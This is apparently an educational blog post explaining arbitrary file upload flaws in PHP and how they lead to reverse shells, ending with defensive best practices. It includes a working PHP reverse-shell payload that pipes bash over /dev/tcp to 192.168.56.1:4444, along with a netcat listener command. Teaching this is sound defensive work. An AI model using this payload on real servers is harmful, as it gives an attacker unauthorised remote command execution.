Reverse Shells and Arbitrary Uploads

Exploring PHP vulnerabilities and how they turn into remote access. This exercise introduces us to one of the most basic —and powerful— techniques in the hacking world: the reverse shell. A simple vulnerable form, a malicious file uploaded without restrictions, and suddenly, the server is talking to you.

PHP: The Server-Side Language

PHP (Hypertext Preprocessor) is an interpreted server-side programming language. Originally designed for web development, and despite criticism, it still powers much of the internet infrastructure.

It executes instructions directly on the server, which means that any uploaded and executed .php file can have full access to the file system, system commands, and more —if not properly controlled.

Common Vulnerabilities in PHP

PHP has been a source of vulnerabilities for years, mainly due to bad practices in:

• Unrestricted file uploads.
• File inclusion (include, require) without path validation.
• Use of dangerous functions like exec(), system(), eval().
• Processing user variables without sanitization ($_GET, $_POST, etc.).

One of the most common —and deadly— is arbitrary file upload.

What is Arbitrary File Upload?

It means that an application allows you to upload any type of file, without checking extensions, content, permissions, or location.

In PHP environments, this can allow an attacker to upload a malicious .php file. When that file is accessed from the browser, the server executes it as code. As a result, the attacker can execute commands, download tools, or establish a reverse shell.

What is a Reverse Shell?

A reverse shell is an outgoing connection from the victim machine to the attacker's machine. Instead of the attacker connecting directly to the server (which may be blocked by firewalls), the compromised machine connects out, opening a remote shell.

Why is it used?

• Evades firewalls that block incoming connections.
• Allows maintaining active sessions from internal networks.
• Is a starting point for lateral movement or persistence.

What can a Reverse Shell do?

Once established, the attacker can:

• Browse the file system.
• Read and modify files.
• Scan the internal network.
• Download additional tools.
• Execute commands as the current user.
• Look for privilege escalation vectors.

All from a simple text connection.

How a Reverse Shell Works in PHP

A basic payload in PHP might look like this:

1<?php
2exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'");
3?>

This tells the server: open a TCP connection to 192.168.56.1 on port 4444, and redirect bash's input and output to that socket. Meanwhile, on the attacker's machine, you wait for the connection with:

1nc -lvnp 4444

When the victim opens the PHP file through the browser, the code executes and the reverse shell is activated.

⚠️ Risks of Not Validating Uploads

The absence of validation in upload forms can:

• Allow remote code execution.
• Provide access to persistent shells.
• Facilitate malware or ransomware.
• Endanger the entire network.

Best practices:

• Limit file types.
• Rename and move uploaded files.
• Validate both on client and server side.
• Never allow execution in upload folders (/uploads/ should be separated from the PHP backend).

Quick Diagnosis: Exposure Checklist

• Does it allow uploading .php?
• Where are the files stored?
• Can I access uploaded files from the browser?
• Is there server-side validation?
• Are files renamed or their content inspected?
• Does it execute code on the server side?

A reverse shell is the system's whisper, telling you: "You're no longer outside." A simple, poorly protected upload function is enough to turn a server into an open door, and you, as an attacker, just need to know where to look.